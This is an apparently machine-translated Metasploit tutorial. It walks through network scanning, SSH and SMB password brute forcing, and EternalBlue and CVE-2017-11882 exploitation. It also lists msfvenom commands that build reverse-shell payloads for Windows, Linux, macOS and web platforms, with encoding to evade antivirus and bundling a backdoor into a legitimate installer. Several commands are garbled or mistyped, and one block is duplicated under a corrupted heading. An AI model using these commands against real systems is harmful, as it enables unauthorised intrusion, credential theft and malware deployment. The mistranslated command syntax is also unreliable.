MSF usage tutorial
1 Introduction
Metasploit is an open source security vulnerability detection tool that comes with hundreds of known software vulnerabilities and is updated frequently. A powerful penetration testing framework dubbed by the security community as “can hack the entire universe.”
2. Introduction to MSF module
1. Auxiliary module auxiliary
Responsible for performing functions such as information collection, scanning, sniffing, fingerprint identification, password guessing and DoS attacks
2. Penetration attack module exploits
The action of exploiting system vulnerabilities to attack. This module corresponds to the attack method (active, passive) of each specific vulnerability.
Active penetration attack: Send network data, triggering security vulnerabilities. For example, web application penetration attacks, SCADA industrial control system service penetration attacks, etc.
Passive penetration attack: Browser software vulnerability attack and file format vulnerability attack, luring target users to open and trigger.
Enter the command in msfconsle:
show exploits #可以查看当前Metasploit支持的渗透攻击模块
3. Attack load module (Payload)
The code that needs to be executed after the target system is penetrated. For example, rebound shell, bind shell, etc.
Enter in the msfconsole interface:
show payloads #可以查看当前系统支持的payloads
4. Empty instruction module (Nops)
Null instructions are no-operation or irrelevant operation instructions that do not have any substantial impact on the running status of some programs. For x86 CPUs, it is 0x90.
Enter in msfconsole:
show nops #可以查看当前系统支持的空指令
5. Encoder module (Encoders)
Function 1: Ensure that there are no "bad characters" in the attack payload that should be avoided during penetration attacks
Function 2: Perform "kill-free" processing of attack loads
Enter in the msfconsole interface:
show encoders #可以查看当前系统支持的编码器
6. Post-penetration attack module (posts)
The post-penetration attack module performs various post-penetration attack actions in the controlled system, such as obtaining sensitive information, further expansion, and implementing springboard attacks.
Enter in the msfconsole interface:
show post #可以显示当前系统支持的后渗透攻击模块
7. Anti-virus module (evasion)
Enter in the msfconsole interface:
show evasion #查看免杀模块
3.MSF common sense
msf update:
sudo apt-get update
sudo apt-get install metasploit-framework
Error when starting msf:
sudo aqt-get install bundler
cd /usr/share/metasploit-framework
sudo bundle install
Command quick check:
| msfconsole | Start MSF from the command line |
|---|---|
| exit | Exit msf |
| use | use a module |
| back | Exit module |
| info | View module details |
| set | Module selection settings |
| run | startup script |
| exploit | startup script |
| show options | View script configuration options |
| show targets | Show applicable host types |
| show payloads | Show applicable payload types |
| search | search for the keyword |
| background | Hide conversations in the background |
| sessions | Session management |
| session -i | Manage sessions based on ID |
4.MSF information collection
1. Host discovery
use auxiliary/scanner/discovery/ 这个路径下有7个脚本用来进行信息收集
0 auxiliary/scanner/discovery/arp_sweep
1 auxiliary/scanner/discovery/empty_udp
2 auxiliary/scanner/discovery/ipv6_multicast_ping
3 auxiliary/scanner/discovery/ipv6_neighbor
4 auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
5 auxiliary/scanner/discovery/udp_probe
6 auxiliary/scanner/discovery/udp_sweep
Take arp_sweep as an example
use auxiliary/scanner/discovery/arp_sweep
show options
set RHOSTS 192.168.1.1/24
set threads 50 #设置线程数50
run
2.Port scanning
use auxiliary/scanner/portscan/*
It is generally recommended to use the syn port scanner because it scans quickly and is not easily discovered.
use auxiliary/scanner/portscan/syn
show options
set RHOSTS 192.168.1.142
set PORTS 1-65535 #全部扫描需要很长时间
set threads 50000
run
3. Detection service details
sudo nmap A -p- -sS sC -T4 -Pn 192.168.1.1
4. Service enumeration
In the scanner auxiliary module in metasploit, there are many tools for service scanning and enumeration, often named after [service_name]_version and [service_name]_login.
[service_name]_versionCan be used to traverse the hosts that contain a certain service on the network, and further determine the version of the service
[service_name]_loginCan be used to conduct password detection attacks on a certain service
SSH service scan
search ssh_version
use 3
show options
set RHOSTS 192.168.1.1/24
set threads 50 #设置线程数50
run
Telnet service scan
search telnet_version
use auxiliary/scanner/telnet/telnet_version
Other service enumeration
use auxiliary/scanner/oracle/tnslsnr_version #oracle服务扫描
use auxiliary/scanner/mssql/mssql_ping #mssql扫描
use auxiliary/scanner/mysql/mysql_version #mysql扫描
use auxiliary/scanner/ftp/ftp_version #ftp扫描
use auxiliary/scanner/http/http_version #http扫描
5. Password guessing
Dictionary position
/usr/share/wordlists #kail中
You can also download the dictionary from Baidu and put it on kail
Password brute force: SSH
search ssh_login
auxiliary/scanner/ssh/ssh_login
set RHOST 192.168.1.1
set USERname kail
set PASS_FILE /home/tools/wordLists/pass_top1000.txt #路径为字典位置
run
Guessing passwords for other services
use auxiliary/scanner/telnet/telnet_login
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/smb/smb_login
6. Website sensitive directory scanning
Note that a directory dictionary needs to be provided here (available in kail):
use auxiliary/scanner/http/dir_scanner
set RHOST 192.168.1.1
run
7. Scan hosts with specific directories on the intranet
use auxiliary/scanner/smb/smb_ms17_010
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
host likely vulnerable to MS17-010 #表示主机存在这个漏洞,可以利用攻击。
host does not appear vulnerable #主机不易受到攻击 / 不存在这个漏洞
5. Active penetration attack
1.Eternal Blue
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.1
exploit
2.Drupal CVE-2018-7600
search Drupal
......
6. Passive penetration attack
Office Remote Code Execution Vulnerability (CVE-2017-11882)
git clone http://github.com/starnightcyber/CVE-2017-11882.git
cd CVE-2017-11882
Vulnerability testing:
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc #-c 嵌入命令
7. msfvenom
| -l | List all available resources for the specified module. Module types include: payloads, encoders, nops,…all |
|---|---|
| -p | Specify the payload (attack load) to be used. You can also use custom payloads, which support almost all platforms. |
| -f | Specify output format |
| -It is | Specify the encoder to be used to avoid killing |
| -a | Specify the target architecture of the payload, such as x86 or x64 or x86_64 |
| -O | Specify the storage location of the created payload |
| -b | Set the avoidance character set and specify the bad characters that need to be filtered. For example: do not use ‘\x0f’, ‘\x00’ |
| -n | Pre-specify a NOP sliding length for the payload |
| -s | Set the maximum length of the effective attack load. The maximum length of the generated payload is the file size. |
| -i | Specify the number of times the payload is encoded |
| -c | Specify an additional win32 shellcode file |
| -x | Specify a custom executable file as a template For example: there is a normal file normal.exe. You can use this option to bundle the backdoor to this program |
| -k | Protect the action of the template program, and the injected payload runs as a new process For example: there is a normal file normal.exe. You can use this option to bundle the backdoor to this program. |
| -in | Specify a custom variable to determine the output format |
| -t | Number of seconds to wait when reading payload from stdin (default 30, 0 means disabled) |
| -h | View help options |
| –platform | Specify the target platform of the payload |
Ordinary generated Trojans
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
msfvenom –p windows/meterpreter/reverse_tcp –f exe –o /root/shell.exe
encoding process
msfvenom -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikita_ga_nai lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
bundle
msfvenom -p windows/meterpreter/reverse_tcp -p latform windows -a x64 -x /root/baidunetdisk.exe -k lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
Windows
msfvenom -platform windows -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f elf > shell.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp lhost=192.168.1.10 port=4444 -f macho > shell.macho
Php
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f raw
Asp
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f asp
Aspx
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f aspx
Jsp
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.1.10 port=4444 -f raw
Python
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f raw
Perl
msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.10 port=4444 -f raw
Bash
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.10 port=4444 -f bash
War
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f war
on
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f raw
Perl
msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.10 port=4444 -f raw
Bash
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.10 port=4444 -f bash
War
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f war